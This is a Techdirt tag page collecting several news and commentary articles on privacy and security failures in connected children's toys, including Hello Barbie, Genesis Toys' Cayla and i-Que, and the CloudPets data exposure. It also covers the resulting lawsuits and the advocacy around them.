smart toys – Techdirt (original) (raw)

Stories filed under: "smart toys"

Privacy Advocates Continue To Warn That Modern Toys Are A Privacy Mess

from the My-Barbie-needs-a-better-firewall dept

A decade or so ago there was a wave of warnings by privacy advocates about how modern toys had become major surveillance devices. Makers of voice recognition toys in particular had a nasty habit, researchers warned, of collecting everything your child says, poorly “anonymizing” the data (a meaningless term), then failing to secure that data from attackers.

A decade later and researchers and activists are still busy trying to get consumers to understand that modern toys are a privacy and security mess. Companies continue to over-collect data on children and monetize that data for advertising, allowing the creation of detailed profiles on children. All while not really making that clear in terms of service. And while hiding behind flimsy claims of “anonymization.”

Year after year, privacy advocates warn that significant reform is needed, and year after year not a whole lot changes when it comes to the warnings or our collective response to them:

It’s just one example of a growing trend, according to nonprofit researchers at the U.S. Public Interest Research Group (PIRG). The organization’s recent report said smart toys bring new risks, including microphones and cameras, paired with significant data collection.

“Having any data collected on a child that isn’t strictly necessary is really reckless and unsafe,” said RJ Cross, of U.S. PIRG.

And this kind of lax privacy and security standards extends to educational computer learning products. A July 2022 study by Human Rights Watch found that the “overwhelming majority” of EdTech products endorsed by 49 governments during the pandemic surveilled or had the capacity to surveil children in ways that risked or infringed on their rights.

Forcing legal accountability for global toymakers is often an uphill climb. You’ll occasionally see a company hit with a major lawsuit (as Genesis Toys was in 2017 after it was discovered that its Bluetooth and Wi-Fi enabled toys lacked even rudimentary security, allowing third-party surveillance of kids), but most of these offenders see no meaningful repercussion for lax security and privacy standards.

And again, all of these toy companies (even the ones hit with major lawsuits) hide behind the idea that there’s nothing to worry about because kid data is “anonymized.” But numerous studies keep showing how it’s easy to identify an “anonymized” individual in a data set like this with just a small smattering of additional data. As more compromised datasets stumble around the Internet, the worse it gets.

COPPA is dated and broken, the U.S. FTC lacks the money or staff to pursue privacy at any meaningful scale, and we still haven’t passed even a rudimentary new privacy law for the Internet era. When it comes to everything from your smartphone apps to your kid’s Wi-Fi connected Barbie, we’ve made it abundantly clear that making money was our top priority, and privacy remains a distant afterthought.

Filed Under: advertising, anonymization, privacy, security, smart toys, toys

New Study Finds Poorly Secured Smart Toys Lets Attackers Listen In On Your Kids

from the barbie-needs-a-better-firewall dept

Thu, Nov 16th 2017 03:50pm - Karl Bode

We’ve long noted how the painful lack of security and privacy standards in the internet of (broken) things is also very well-represented in the world of connected toys. Like IOT vendors, toymakers were so eager to make money, they left even basic privacy and security standards stranded in the rear view mirror as they rush to connect everything to the internet. As a result, we’ve seen repeated instances where your kids’ conversations and interests are being hoovered up without consent, with the data frequently left unencrypted and openly accessible in the cloud.

With Luddites everywhere failing to realize that modern Barbie needs a better firewall, this is increasingly becoming a bigger problem. The latest case in point: new research by Which? and the German consumer group Stiftung Warentest found yet more flaws in Bluetooth and wifi-enabled toys that allow a total stranger to listen in on or chat up your toddler:

“The investigation found that four out of seven of the tested toys could be used to communicate with the children playing with them. Security failures were discovered in the Furby Connect, i-Que Intelligent Robot, Toy-Fi Teddy and CloudPets.

With each of these toys, the Bluetooth connection had not been secured, meaning the researcher did not need a password, pin or any other authentication to gain access. Little technical knowhow was needed to hack into the toys to start sharing messages with a child.

Again, the problem isn’t just bad security, it’s the total lack of security:

“With the i-Que Intelligent Robot, available from Argos and Hamleys, the investigation discovered that anyone could download the app, find an i-Que within their Bluetooth range and start using the robot?s voice by typing into a text field. The toy is made by Genesis, which also manufactures the My Friend Cayla doll, recently banned in Germany owing to security and hacking concerns. Both toys are distributed in the UK by Vivid.”

Genesis was already facing a lawsuit here in the States accusing it of violating COPPA (the Childrens? Online Privacy Protection Act of 1998) by failing to adequately inform parents’ that their kids conversations and personal data collected by the toys are being shipped off to servers and third-party companies. Said lawsuit also points out how the privacy policies governing the collection of kids’ data aren’t clear, aren’t prominently displayed, and often change without notice. Overseas the reaction has been notably more hysterical, with German regulators urging parents to destroy these not-so-smart dolls or pay massive fines.

As is usually the case, the companies responsible for this total privacy and security failure like to portray these flaws as limited in scope and unlikely to be exploited:

“The British Toy and Hobby Association, of which Vivid and Hasbro are members, said: ?The industry takes its responsibilities incredibly seriously when making products for children, with BTHA members investing heavily in everything from toy safety to data privacy and online security.

“We are aware of the Which? report, but understand the circumstances in which these investigations have taken place rely on a perfect set of circumstances and manipulation of the toys and the software that make the outcome highly unlikely in reality.”

Again though, this is often not just vulnerabilities we’re talking about, but no security or privacy standards whatsoever. The idea that this isn’t being exploited, however infrequent, seems unlikely — especially as the media highlights more and more similar flaws. And again, with the internet of broken things introducing millions of new attack vectors into homes and businesses worldwide every day, the impact from this sort of privacy and security apathy will be cumulative.

Filed Under: iot, kids, privacy, smart toys, surveillance

'Smart' Stuffed Animal Company Leaves Voice, Other Data Of Millions Publicly Exposed

from the internet-of-not-so-smart-things dept

Tue, Feb 28th 2017 10:51am - Karl Bode

So we’ve noted time and time again how so-called “smart” toys aren’t immune to the security and privacy problems plaguing the internet of broken things. Whether we’re talking about the Vtech hack (which exposed kids’ selfies, chat logs, and voice recordings) or the lawsuits against Genesis Toys (whose products suffer from vulnerabilities to man-in-the-middle attacks), the story remains the same: these companies were so excited to connect everything and anything to the internet, but few could be bothered to spend more than a fleeting moment thinking about product security and consumer privacy.

Troy Hunt, creator of the very useful Have I Been Pwned? website, this week highlighted one of the biggest privacy breaches yet when it comes to the connected toy market. Spiral Toys makes the CloudPets line of stuffed animals, which adorably record and play back voice messages that can be sent over the Internet by parents and children alike. Less adorable is the fact that this collected data is stored by a Romanian company called mReady, which apparently left this data in a public available database neither protected by a password nor placed behind a firewall.

As such, that data was publicly accessible to anybody perusing the data via the Shodan search engine. And while it’s hard to nail down a precise number, Hunt estimates that somewhere around 2 million voice recordings of children and parents were just left exposed to the open air, as well as the e-mail addresses and passwords for more than 800,000 Spiral Toys CloudPets accounts.

On a positive note, the company did appear to keep CloudPets stored passwords as a bcrypt hash, one of the more secure methods available. But that appears to have been compromised by the fact that the company (as outlined in this instructional video for customers) has absolutely no restrictions when it comes to minimal password strength:

“However, counteracting that is the fact that CloudPets has absolutely no password strength rules. When I say “no rules”, I mean you can literally have a password of “a”. That’s right, just a single character. The password used here in the demonstration is literally just “qwe”; 3 characters and a keyboard sequence. What this meant is that when I passed the bcrypt hashes into hashcat and checked them against some of the world’s most common passwords (“qwerty”, “password”, “123456”, etc.) along with the passwords “qwe” and “cloudpets”, I cracked a large number in a very short time.”

As we’ve seen with so many IoT companies, many simply don’t respond when contacted and warned about vulnerabilities. And when they are warned, lawsuit threats are often more common than cogent responses. In this case, Hunt notes that Spiral Toys was contacted three times about the data being publicly exposed and its weak password rules, and it chose to ignore each one of them:

“3 attempts to warn the organisation of a serious security vulnerability and not a single response. I’ve said many times before in many blog posts, public talks and workshops that one of the greatest difficulties I have in dealing with data breaches is getting a response from the organisation involved. Time and time again, there are extensive delays or no response at all from the very people that should be the most interested in incidents like this. If you run any sort of online service whatsoever, think about what’s involved in ensuring someone can report this sort of thing to you because this whole story could have had a very different outcome otherwise.”

In other words, here’s yet another company that not only thinks security and privacy are an afterthought, but can’t actually be bothered to respond when informed that the data of millions of users was just sitting unsecured in public view. These companies don’t appear to realize it, but their incompetence acts as a living, breathing advertisement for why dumb toys and devices remain the smarter option.

Filed Under: children, cloudpets, iot, security, smart toys, stuffed animals
Companies: spiral toys

Another Lawsuit Highlights How Many 'Smart' Toys Violate Privacy, Aren't Secure

from the Barbie-is-a-rat dept

Thu, Dec 8th 2016 01:05pm - Karl Bode

So we’ve talked a bit about the privacy implications of smart toys, and the fact that people aren’t exactly thrilled that Barbie now tracks your childrens’ behavior and then uploads that data to the cloud. Like most internet-of-not-so-smart things, these toys often come with flimsy security and only a passing interest in privacy. As such we’ve increasingly seen events like the Vtech hack, where hackers obtained the names, email addresses, passwords, and home addresses of 4,833,678 parents, and the first names, genders and birthdays of more than 200,000 kids.

Unsurprisingly, the collection of kids’ babbling while in the company of smart toys continues to ruffle feathers. This week, a coalition of consumer advocates including the Consumer’s Union filed suit against Genesis Toys, the maker of two such toys, the My Friend Cayla doll and the i-Que Intelligent Robot. According to the full lawsuit (pdf), the toy maker is violating COPPA (the Childrens? Online Privacy Protection Act of 1998) by failing to adequately inform parents’ that their kids conversations and personal data collected by the toys are being shipped off to servers and third-party companies.

Among the problems cited in the complaint is that the privacy policies governing the collection of kids’ data aren’t clear, aren’t prominently displayed, and often change without notice. Parents aren’t properly informed that data is being culled from the toys and sent off to companies like Nuance Communications, most commonly known for its Dragon voice recognition software, but a company that also has prominent roles in healthcare dictation and as a defense contractor. Both toys by proxy are governed by Nuance’s privacy policy, which among other things says:

“We may use the information that we collect for our internal purposes to develop, tune, enhance, and improve our products and services, and for advertising and marketing consistent with this Privacy Policy.” It continues, ?If you are under 18 or otherwise would be required to have parent or guardian consent to share information with Nuance, you should not send any information about yourself to us.”

With the toys being marketed to “ages 4 and up” and being mostly used by kids under age 18, the lawsuit states the companies selling and collecting this toy data are violating COPPA. Under COPPA, companies gathering kids data have to provide notice to, and obtain consent from parents regarding data collection. They also have to provide parents tools to access, review and delete this data if wanted, as well as the parental ability to dictate that the data can be collected, but not shared with third parties. The complaint suggests neither Nuance or Genesis Toys are doing any of this.

And again, privacy is just part of the equation. There’s also the fact that these toys just aren’t all that secure. A report by the Norwegian Consumer Council (pdf) found that a lot of the data being transmitted by these toys is done so via vanilla, unencrypted HTTP connections that could be subject to man in the middle attacks. Reconfiguring the devices to create in-home surveillance tools was also “very easy and requires little technical know-how,” according to the report.

So again, much like all internet of things devices, companies were so excited to integrate internet connectivity, they effectively forgot about user privacy and security. Are we perhaps noticing a ongoing theme yet?

Filed Under: coppa, i-que intelligent robot, iot, my friend cayla, privacy, security, smart toys
Companies: genesis toys, nuance

Barbie Joins The Growing Chorus Of People And Devices Spying On You

from the let's-discuss-your-shopping-preferences,-susie dept

Thu, Mar 19th 2015 03:47pm - Karl Bode

Samsung recently took a significant media beating after people actually bothered to read the company’s privacy policy, only to discover that the company’s “smart” TVs were collecting snippets of living room conversation and transmitting them to third parties for analysis. Samsung ultimately issued a blog post stating it was only collecting a limited amount of voice data to improve voice command functionality. Besides, said Samsung, if you don’t want your voice commands collected, you can disable the functionality (even though you lose some core TV features in the process).

Of course, while Samsung got the brunt of the public and media hysteria, many people didn’t seem to realize that nearly everything that takes voice commands (from your home automation system to your iPhone) already engages in this same behavior. Case in point: Mattel is taking more than a little heat for the company’s new “Hello Barbie,” which connects to Wi-Fi, and also records kids’ voice commands and routes them to an external server in order to improve voice command tech. In this video from February, Mattel shows how Barbie now stores your preferences and even provides career advice:

Groups like Campaign For a Commercial-Free Childhood weren’t impressed, and see this as the opening salvo in a disturbing trend in marketing to children:

“Imagine your children playing with a Wi-Fi-connected doll that records their conversations–and then transmits them to a corporation which analyzes every word to learn “all of [the child’s] likes and dislikes.” That?s exactly what Mattel?s eavesdropping ?Hello Barbie? will do if it is released this fall, as planned. But we can stop it!

Kids using “Hello Barbie”‘ won’t only be talking to a doll, they’ll be talking directly to a toy conglomerate whose only interest in them is financial. It’s creepy?and creates a host of dangers for children and families. Children naturally reveal a lot about themselves when they play. In Mattel?s demo, Barbie asks many questions that encourage kids to share information about their interests, their families, and more?information advertisers can use to market unfairly to children.”

While the CFCC works to keep the toy from store shelves, Mattel is promising that security and privacy has been their top priority while crafting a doll that learns what kids like:

“Mattel and ToyTalk, the San Francisco-based start-up that created the technology used in the doll, say the privacy and security of the technology have been their top priority. “Mattel is committed to safety and security, and Hello Barbie conforms to applicable government standards,” Mattel said in a statement.”

The problem is, we’ve seen repeatedly how the companies rushing face-first toward the billions in potential revenues from the “Internet of Things” market are so fixated on profit, that security and privacy have been afterthoughts — if a thought at all. It doesn’t matter if we’re talking about Smart TVs with trivial to non-existent security or easily hacked smart car tech, companies are showing again and again that privacy and security really aren’t paramount. That’s before we even discuss how this collected voice data creates a wonderful new target for nosy governments courtesy of the Third Party Doctrine.

So while some of this hysteria over what’s being collected probably veers into hyperbole territory, the cardboard-grade security and privacy standards most companies are adopting certainly create cause for concern. The good news I suppose: the “smarter” our products get, the bigger the market is for “dumb” products that just sit there and do what they’re supposed to do, whether that’s a television that just displays the damn signal sent to it or utterly insentient dolls that just shut up, smile and drink their fake tea.

Filed Under: barbie, privacy, smart devices, smart toys
Companies: mattel